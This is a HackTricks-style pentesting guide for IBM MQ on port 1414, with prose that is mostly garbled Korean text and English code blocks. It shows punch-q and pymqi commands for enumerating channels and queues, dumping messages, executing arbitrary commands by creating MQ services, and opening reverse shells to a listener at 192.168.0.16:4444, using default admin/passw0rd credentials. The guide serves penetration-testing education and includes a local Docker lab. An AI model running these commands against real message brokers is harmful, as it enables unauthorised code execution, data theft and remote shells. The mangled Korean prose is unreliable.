# 1414 - Pentesting IBM MQ
{% hint style="success" %}
Learn & practice AWS Hacking:
[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
Learn & practice GCP Hacking: 
[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** π¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** π¦ [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}
## Basic information
IBM MQλ λ©μμ§ νλ₯Ό κ΄λ¦¬νκΈ° μν IBM κΈ°μ μ
λλ€. λ€λ₯Έ **λ©μμ§ λΈλ‘컀** κΈ°μ κ³Ό λ§μ°¬κ°μ§λ‘, μμ°μμ μλΉμ κ°μ μ 보λ₯Ό μμ , μ μ₯, μ²λ¦¬ λ° λΆλ₯νλ λ° μ λ
νκ³ μμ΅λλ€.
κΈ°λ³Έμ μΌλ‘ **IBM MQ TCP ν¬νΈ 1414λ₯Ό λ
ΈμΆν©λλ€**.
λλλ‘, HTTP REST APIλ ν¬νΈ **9443**μμ λ
ΈμΆλ μ μμ΅λλ€.
λ©νΈλ¦(ν둬ν
μ°μ€)μ TCP ν¬νΈ **9157**μμ μ κ·Όν μλ μμ΅λλ€.
IBM MQ TCP ν¬νΈ 1414λ λ©μμ§, ν, μ±λ λ±μ μ‘°μνλ λ° μ¬μ©λ μ μμ§λ§, **μΈμ€ν΄μ€λ₯Ό μ μ΄νλ λ°λ μ¬μ©λ μ μμ΅λλ€**.
IBMμ [https://www.ibm.com/docs/en/ibm-mq](https://www.ibm.com/docs/en/ibm-mq)μμ μ¬μ©ν μ μλ λ°©λν κΈ°μ λ¬Έμλ₯Ό μ 곡ν©λλ€.
## Tools
μ¬μ΄ μ΅μ€νλ‘μμ μν μΆμ² λꡬλ **[punch-q](https://github.com/sensepost/punch-q)**λ‘, Dockerλ₯Ό μ¬μ©ν©λλ€. μ΄ λꡬλ Python λΌμ΄λΈλ¬λ¦¬ `pymqi`λ₯Ό μ κ·Ήμ μΌλ‘ μ¬μ©ν©λλ€.
λ³΄λ€ μλμ μΈ μ κ·Όμ μν΄ Python λΌμ΄λΈλ¬λ¦¬ **[pymqi](https://github.com/dsuch/pymqi)**λ₯Ό μ¬μ©νμΈμ. [IBM MQ μμ‘΄μ±](https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+MQ&release=9.0.0.4&platform=All&function=fixId&fixids=9.0.0.4-IBM-MQC-*,9.0.0.4-IBM-MQ-Install-Java-All,9.0.0.4-IBM-MQ-Java-InstallRA&useReleaseAsTarget=true&includeSupersedes=0&source=fc)μ΄ νμν©λλ€.
### Installing pymqi
**IBM MQ μμ‘΄μ±**μ μ€μΉνκ³ λ‘λν΄μΌ ν©λλ€:
1. [https://login.ibm.com/](https://login.ibm.com/)μμ κ³μ (IBMid)μ μμ±ν©λλ€.
2. [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+MQ&release=9.0.0.4&platform=All&function=fixId&fixids=9.0.0.4-IBM-MQC-*,9.0.0.4-IBM-MQ-Install-Java-All,9.0.0.4-IBM-MQ-Java-InstallRA&useReleaseAsTarget=true&includeSupersedes=0&source=fc](https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+MQ&release=9.0.0.4&platform=All&function=fixId&fixids=9.0.0.4-IBM-MQC-*,9.0.0.4-IBM-MQ-Install-Java-All,9.0.0.4-IBM-MQ-Java-InstallRA&useReleaseAsTarget=true&includeSupersedes=0&source=fc)μμ IBM MQ λΌμ΄λΈλ¬λ¦¬λ₯Ό λ€μ΄λ‘λν©λλ€. Linux x86_64μ κ²½μ° **9.0.0.4-IBM-MQC-LinuxX64.tar.gz**μ
λλ€.
3. μμΆμ νλλ€ (`tar xvzf 9.0.0.4-IBM-MQC-LinuxX64.tar.gz`).
4. `sudo ./mqlicense.sh`λ₯Ό μ€ννμ¬ λΌμ΄μΌμ€ 쑰건μ λμν©λλ€.
> Kali Linuxλ₯Ό μ¬μ©νλ κ²½μ°, νμΌ `mqlicense.sh`λ₯Ό μμ ν©λλ€: λ€μ μ€(105-110ν)μ μ κ±°/μ£Όμ μ²λ¦¬ν©λλ€:
>
>```bash
>if [ ${BUILD_PLATFORM} != `uname`_`uname ${UNAME_FLAG}` ]
> then
> echo "ERROR: This package is incompatible with this system"
> echo " This package was built for ${BUILD_PLATFORM}"
> exit 1
>fi
>```
5. μ΄λ¬ν ν¨ν€μ§λ₯Ό μ€μΉν©λλ€:
```bash
sudo rpm --prefix /opt/mqm -ivh --nodeps --force-debian MQSeriesRuntime-9.0.0-4.x86_64.rpm
sudo rpm --prefix /opt/mqm -ivh --nodeps --force-debian MQSeriesClient-9.0.0-4.x86_64.rpm
sudo rpm --prefix /opt/mqm -ivh --nodeps --force-debian MQSeriesSDK-9.0.0-4.x86_64.rpm
```
6. κ·Έλ° λ€μ, λ€λ₯Έ λꡬλ₯Ό μ΄λ¬ν μ’
μμ±μ μ¬μ©νμ¬ μ€ννκΈ° **μ μ** `.so` νμΌμ LDμ μμλ‘ μΆκ°ν©λλ€: `export LD_LIBRARY_PATH=/opt/mqm/lib64`.
κ·Έλ° λ€μ, νλ‘μ νΈ [**pymqi**](https://github.com/dsuch/pymqi)λ₯Ό ν΄λ‘ ν μ μμ΅λλ€: ν₯λ―Έλ‘μ΄ μ½λ μ‘°κ°, μμ λ±μ ν¬ν¨νκ³ μμ΅λλ€... λλ λ€μκ³Ό κ°μ΄ λΌμ΄λΈλ¬λ¦¬λ₯Ό μ§μ μ€μΉν μ μμ΅λλ€: `pip install pymqi`.
### Using punch-q
#### With Docker
κ°λ¨ν μ¬μ©νμΈμ: `sudo docker run --rm -ti leonjza/punch-q`.
#### Without Docker
νλ‘μ νΈ [**punch-q**](https://github.com/sensepost/punch-q)λ₯Ό ν΄λ‘ ν λ€μ, μ€μΉλ₯Ό μν΄ readmeλ₯Ό λ°λ₯΄μΈμ (`pip install -r requirements.txt && python3 setup.py install`).
κ·Έ ν, `punch-q` λͺ
λ ΉμΌλ‘ μ¬μ©ν μ μμ΅λλ€.
## Enumeration
**punch-q** λλ **pymqi**λ₯Ό μ¬μ©νμ¬ **ν κ΄λ¦¬μ μ΄λ¦, μ¬μ©μ, μ±λ λ° ν**λ₯Ό μ΄κ±°ν μ μμ΅λλ€.
### Queue Manager
λλλ‘, ν κ΄λ¦¬μ μ΄λ¦μ μ»λ κ²μ λν 보νΈκ° μμ΅λλ€:
```bash
β― sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 discover name
Queue Manager name: MYQUEUEMGR
```
### Channels
**punch-q**λ κΈ°μ‘΄ μ±λμ μ°ΎκΈ° μν΄ λ΄λΆ(μμ κ°λ₯ν) λ¨μ΄ λͺ©λ‘μ μ¬μ©ν©λλ€. μ¬μ© μ:
```bash
β― sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd discover channels
"DEV.ADMIN.SVRCONN" exists and was authorised.
"SYSTEM.AUTO.SVRCONN" might exist, but user was not authorised.
"SYSTEM.DEF.SVRCONN" might exist, but user was not authorised.
```
μΌλΆ IBM MQ μΈμ€ν΄μ€κ° **μΈμ¦λμ§ μμ** MQ μμ²μ μλ½νλ―λ‘ `--username / --password`κ° νμνμ§ μμ΅λλ€. λ¬Όλ‘ , μ κ·Ό κΆνμ λ€λ₯Ό μ μμ΅λλ€.
νλμ μ±λ μ΄λ¦(μ¬κΈ°μλ: `DEV.ADMIN.SVRCONN`)μ μ»μΌλ©΄, λ€λ₯Έ λͺ¨λ μ±λμ μ΄κ±°ν μ μμ΅λλ€.
μ΄κ±°λ κΈ°λ³Έμ μΌλ‘ **pymqi**μ μ΄ μ½λ μ€λν« `code/examples/dis_channels.py`λ‘ μνν μ μμ΅λλ€:
```python
import logging
import pymqi
logging.basicConfig(level=logging.INFO)
queue_manager = 'MYQUEUEMGR'
channel = 'DEV.ADMIN.SVRCONN'
host = '172.17.0.2'
port = '1414'
conn_info = '%s(%s)' % (host, port)
user = 'admin'
password = 'passw0rd'
prefix = '*'
args = {pymqi.CMQCFC.MQCACH_CHANNEL_NAME: prefix}
qmgr = pymqi.connect(queue_manager, channel, conn_info, user, password)
pcf = pymqi.PCFExecute(qmgr)
try:
response = pcf.MQCMD_INQUIRE_CHANNEL(args)
except pymqi.MQMIError as e:
if e.comp == pymqi.CMQC.MQCC_FAILED and e.reason == pymqi.CMQC.MQRC_UNKNOWN_OBJECT_NAME:
logging.info('No channels matched prefix `%s`' % prefix)
else:
raise
else:
for channel_info in response:
channel_name = channel_info[pymqi.CMQCFC.MQCACH_CHANNEL_NAME]
logging.info('Found channel `%s`' % channel_name)
qmgr.disconnect()
```
... νμ§λ§ **punch-q**λ κ·Έ λΆλΆλ ν¬ν¨νκ³ μμ΅λλ€ (λ λ§μ μ 보μ ν¨κ»!).
λ€μκ³Ό κ°μ΄ μ€νν μ μμ΅λλ€:
```bash
β― sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN show channels -p '*'
Showing channels with prefix: "*"...
| Name | Type | MCA UID | Conn Name | Xmit Queue | Description | SSL Cipher |
|----------------------|-------------------|---------|-----------|------------|-----------------|------------|
| DEV.ADMIN.SVRCONN | Server-connection | | | | | |
| DEV.APP.SVRCONN | Server-connection | app | | | | |
| SYSTEM.AUTO.RECEIVER | Receiver | | | | Auto-defined by | |
| SYSTEM.AUTO.SVRCONN | Server-connection | | | | Auto-defined by | |
| SYSTEM.DEF.AMQP | AMQP | | | | | |
| SYSTEM.DEF.CLUSRCVR | Cluster-receiver | | | | | |
| SYSTEM.DEF.CLUSSDR | Cluster-sender | | | | | |
| SYSTEM.DEF.RECEIVER | Receiver | | | | | |
| SYSTEM.DEF.REQUESTER | Requester | | | | | |
| SYSTEM.DEF.SENDER | Sender | | | | | |
| SYSTEM.DEF.SERVER | Server | | | | | |
| SYSTEM.DEF.SVRCONN | Server-connection | | | | | |
| SYSTEM.DEF.CLNTCONN | Client-connection | | | | | |
```
### Queues
**pymqi**(`dis_queues.py`)μ ν¨κ» μ½λ μ€λν«μ΄ μμ§λ§ **punch-q**λ νμ λν λ λ§μ μ 보λ₯Ό κ²μν μ μκ² ν΄μ€λλ€:
```bash
β― sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN show queues -p '*'
Showing queues with prefix: "*"...
| Created | Name | Type | Usage | Depth | Rmt. QM | Rmt. Qu | Description |
| | | | | | GR Name | eue Nam | |
| | | | | | | e | |
|-----------|----------------------|--------|---------|--------|---------|---------|-----------------------------------|
| 2023-10-1 | DEV.DEAD.LETTER.QUEU | Local | Normal | 0 | | | |
| 0 18.35.1 | E | | | | | | |
| 9 | | | | | | | |
| 2023-10-1 | DEV.QUEUE.1 | Local | Normal | 0 | | | |
| 0 18.35.1 | | | | | | | |
| 9 | | | | | | | |
| 2023-10-1 | DEV.QUEUE.2 | Local | Normal | 0 | | | |
| 0 18.35.1 | | | | | | | |
| 9 | | | | | | | |
| 2023-10-1 | DEV.QUEUE.3 | Local | Normal | 0 | | | |
| 0 18.35.1 | | | | | | | |
| 9 | | | | | | | |
# Truncated
```
## Exploit
### Dump messages
ν(λ€)/μ±λ(λ€)μ λμμΌλ‘ νμ¬ λ©μμ§λ₯Ό μ€λννκ±°λ λ€νν μ μμ΅λλ€(λΉνκ΄΄μ μμ
). *μμ:*
```bash
β― sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN messages sniff
```
```bash
β― sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN messages dump
```
**λͺ¨λ μλ³λ νμ λν΄ λ°λ³΅νλ κ²μ μ£Όμ νμ§ λ§μμμ€.**
### μ½λ μ€ν
> κ³μνκΈ° μ μ λͺ κ°μ§ μΈλΆμ 보: IBM MQλ μ¬λ¬ λ°©λ²μΌλ‘ μ μ΄ν μ μμ΅λλ€: MQSC, PCF, Control Command. μΌλ°μ μΈ λͺ©λ‘μ [IBM MQ λ¬Έμ](https://www.ibm.com/docs/en/ibm-mq/9.2?topic=reference-command-sets-comparison)μμ μ°Ύμ μ μμ΅λλ€.
> [**PCF**](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=commands-introduction-mq-programmable-command-formats) (***νλ‘κ·Έλλ¨ΈλΈ μ»€λ§¨λ ν¬λ§·***)λ μΈμ€ν΄μ€μ μ격μΌλ‘ μνΈμμ©νκΈ° μν΄ μ°λ¦¬κ° μ§μ€νλ κ²μ
λλ€. **punch-q**μ λλΆμ΄ **pymqi**λ PCF μνΈμμ©μ κΈ°λ°μΌλ‘ ν©λλ€.
>
> PCF λͺ
λ Ή λͺ©λ‘μ μ°Ύμ μ μμ΅λλ€:
> * [PCF λ¬Έμμμ](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=reference-definitions-programmable-command-formats), λ°
> * [μμμμ](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=constants-mqcmd-command-codes).
>
> ν₯λ―Έλ‘μ΄ λͺ
λ Ή μ€ νλλ `MQCMD_CREATE_SERVICE`μ΄λ©°, κ·Έ λ¬Έμλ [μ¬κΈ°](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=formats-change-copy-create-service-multiplatforms)μμ νμΈν μ μμ΅λλ€. μ΄ λͺ
λ Ήμ μΈμ€ν΄μ€μ λ‘컬 νλ‘κ·Έλ¨μ κ°λ¦¬ν€λ `StartCommand`λ₯Ό μΈμλ‘ μ¬μ©ν©λλ€ (μ: `/bin/sh`).
>
> λ¬Έμμλ μ΄ λͺ
λ Ήμ λν κ²½κ³ λ μμ΅λλ€: *"μ£Όμ: μ΄ λͺ
λ Ήμ μ¬μ©μκ° mqm κΆνμΌλ‘ μμμ λͺ
λ Ήμ μ€νν μ μλλ‘ νμ©ν©λλ€. μ΄ λͺ
λ Ήμ μ¬μ©ν κΆνμ΄ λΆμ¬λλ©΄, μ
μμ μ΄κ±°λ λΆμ£Όμν μ¬μ©μκ° μμ€ν
μ΄λ λ°μ΄ν°λ₯Ό μμμν¬ μ μλ μλΉμ€λ₯Ό μ μν μ μμ΅λλ€. μλ₯Ό λ€μ΄, νμ νμΌμ μμ νλ κ²μ
λλ€."*
>
> *μ°Έκ³ : νμ IBM MQ λ¬Έμ(κ΄λ¦¬ μ°Έμ‘°)μ λ°λ₯΄λ©΄, μλΉμ€ μμ±μ μν λλ±ν MQSC λͺ
λ Ή(`DEFINE SERVICE`)μ μ€ννκΈ° μν΄ `/admin/action/qmgr/{qmgrName}/mqsc`μ HTTP μλν¬μΈνΈκ° μμ΅λλ€. μ΄ μΈ‘λ©΄μ μμ§ μ¬κΈ°μμ λ€λ£¨μ΄μ§μ§ μμμ΅λλ€.*
μ격 νλ‘κ·Έλ¨ μ€νμ μν PCFλ₯Ό μ¬μ©ν μλΉμ€ μμ±/μμ λ **punch-q**λ‘ μνν μ μμ΅λλ€:
**μμ 1**
```bash
β― sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command execute --cmd "/bin/sh" --args "-c id"
```
> IBM MQμ λ‘κ·Έμμ λͺ
λ Ήμ΄ μ±κ³΅μ μΌλ‘ μ€νλμμμ νμΈν μ μμ΅λλ€:
>
> ```bash
> 2023-10-10T19:13:01.713Z AMQ5030I: The Command '808544aa7fc94c48' has started. ProcessId(618). [ArithInsert1(618), CommentInsert1(808544aa7fc94c48)]
> ```
κΈ°κ³μμ κΈ°μ‘΄ νλ‘κ·Έλ¨μ λμ΄ν μλ μμ΅λλ€ (μ¬κΈ°μ `/bin/doesnotexist` ... μ‘΄μ¬νμ§ μμ΅λλ€):
```bash
β― sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command execute --cmd "/bin/doesnotexist" --arg
s "whatever"
Command: /bin/doesnotexist
Arguments: -c id
Service Name: 6e3ef5af652b4436
Creating service...
Starting service...
The program '/bin/doesnotexist' is not available on the remote system.
Giving the service 0 second(s) to live...
Cleaning up service...
Done
```
**νλ‘κ·Έλ¨ μ€νμ΄ λΉλκΈ°μ μ΄λΌλ μ μ μ μνμΈμ. λ°λΌμ μ΅μ€νλ‘μμ νμ©νκΈ° μν΄ λ λ²μ§Έ νλͺ©μ΄ νμν©λλ€** ***(리λ²μ€ μ
Έμ μν 리μ€λ, λ€λ₯Έ μλΉμ€μμμ νμΌ μμ±, λ€νΈμν¬λ₯Ό ν΅ν λ°μ΄ν° μ μΆ ...)***
**μμ 2**
μ¬μ΄ 리λ²μ€ μ
Έμ μν΄, **punch-q**λ λ κ°μ§ 리λ²μ€ μ
Έ νμ΄λ‘λλ₯Ό μ μν©λλ€:
* νλλ bash
* νλλ perl
*λ¬Όλ‘ `execute` λͺ
λ Ήμ΄λ‘ μ¬μ©μ μ μ νμ΄λ‘λλ₯Ό λ§λ€ μ μμ΅λλ€.*
bashμ κ²½μ°:
```bash
β― sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command reverse -i 192.168.0.16 -p 4444
```
```markdown
perlμ κ²½μ°:
```
```bash
β― sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command reverse -i 192.168.0.16 -p 4444
```
### Custom PCF
IBM MQ λ¬Έμλ₯Ό μ΄ν΄λ³΄κ³ **pymqi** νμ΄μ¬ λΌμ΄λΈλ¬λ¦¬λ₯Ό μ§μ μ¬μ©νμ¬ **punch-q**μ ꡬνλμ§ μμ νΉμ PCF λͺ
λ Ήμ ν
μ€νΈν μ μμ΅λλ€.
**Example:**
```python
import pymqi
queue_manager = 'MYQUEUEMGR'
channel = 'DEV.ADMIN.SVRCONN'
host = '172.17.0.2'
port = '1414'
conn_info = '%s(%s)' % (host, port)
user = 'admin'
password = 'passw0rd'
qmgr = pymqi.connect(queue_manager, channel, conn_info, user, password)
pcf = pymqi.PCFExecute(qmgr)
try:
# Replace here with your custom PCF args and command
# The constants can be found in pymqi/code/pymqi/CMQCFC.py
args = {pymqi.CMQCFC.xxxxx: "value"}
response = pcf.MQCMD_CUSTOM_COMMAND(args)
except pymqi.MQMIError as e:
print("Error")
else:
# Process response
qmgr.disconnect()
```
If you cannot find the constant names, you can refer to the [IBM MQ documentation](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=constants-mqca-character-attribute-selectors).
> *Example for [`MQCMD_REFRESH_CLUSTER`](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=formats-mqcmd-refresh-cluster-refresh-cluster) (Decimal = 73). It needs the parameter `MQCA_CLUSTER_NAME` (Decimal = 2029) which can be `*` (Doc: ):*
>
> ```python
> import pymqi
>
> queue_manager = 'MYQUEUEMGR'
> channel = 'DEV.ADMIN.SVRCONN'
> host = '172.17.0.2'
> port = '1414'
> conn_info = '%s(%s)' % (host, port)
> user = 'admin'
> password = 'passw0rd'
>
> qmgr = pymqi.connect(queue_manager, channel, conn_info, user, password)
> pcf = pymqi.PCFExecute(qmgr)
>
> try:
> args = {2029: "*"}
> response = pcf.MQCMD_REFRESH_CLUSTER(args)
> except pymqi.MQMIError as e:
> print("Error")
> else:
> print(response)
>
> qmgr.disconnect()
> ```
## Testing environment
If you want to test the IBM MQ behavior and exploits, you can set up a local environment based on Docker:
1. ibm.com λ° cloud.ibm.comμ κ³μ μ΄ μμ΄μΌ ν©λλ€.
2. λ€μμ μ¬μ©νμ¬ μ»¨ν
μ΄λνλ IBM MQλ₯Ό μμ±ν©λλ€:
```bash
sudo docker pull icr.io/ibm-messaging/mq:9.3.2.0-r2
sudo docker run -e LICENSE=accept -e MQ_QMGR_NAME=MYQUEUEMGR -p1414:1414 -p9157:9157 -p9443:9443 --name testing-ibmmq icr.io/ibm-messaging/mq:9.3.2.0-r2
```
κΈ°λ³Έμ μΌλ‘ μΈμ¦μ΄ νμ±νλμ΄ μμΌλ©°, μ¬μ©μ μ΄λ¦μ `admin`μ΄κ³ λΉλ°λ²νΈλ `passw0rd`μ
λλ€ (νκ²½ λ³μ `MQ_ADMIN_PASSWORD`).
μ¬κΈ°μ ν κ΄λ¦¬μ μ΄λ¦μ `MYQUEUEMGR`λ‘ μ€μ λμ΄ μμ΅λλ€ (λ³μ `MQ_QMGR_NAME`).
IBM MQκ° μ€ν μ€μ΄λ©° ν¬νΈκ° λ
ΈμΆλμ΄ μμ΄μΌ ν©λλ€:
```bash
β― sudo docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
58ead165e2fd icr.io/ibm-messaging/mq:9.3.2.0-r2 "runmqdevserver" 3 seconds ago Up 3 seconds 0.0.0.0:1414->1414/tcp, 0.0.0.0:9157->9157/tcp, 0.0.0.0:9443->9443/tcp testing-ibmmq
```
> IBM MQ λ컀 μ΄λ―Έμ§μ μ΄μ λ²μ μ λ€μμ μμ΅λλ€: https://hub.docker.com/r/ibmcom/mq/.
## References
* [mgeeky's gist - "Practical IBM MQ Penetration Testing notes"](https://gist.github.com/mgeeky/2efcd86c62f0fb3f463638911a3e89ec)
* [MQ Jumping - DEFCON 15](https://defcon.org/images/defcon-15/dc15-presentations/dc-15-ruks.pdf)
* [IBM MQ documentation](https://www.ibm.com/docs/en/ibm-mq)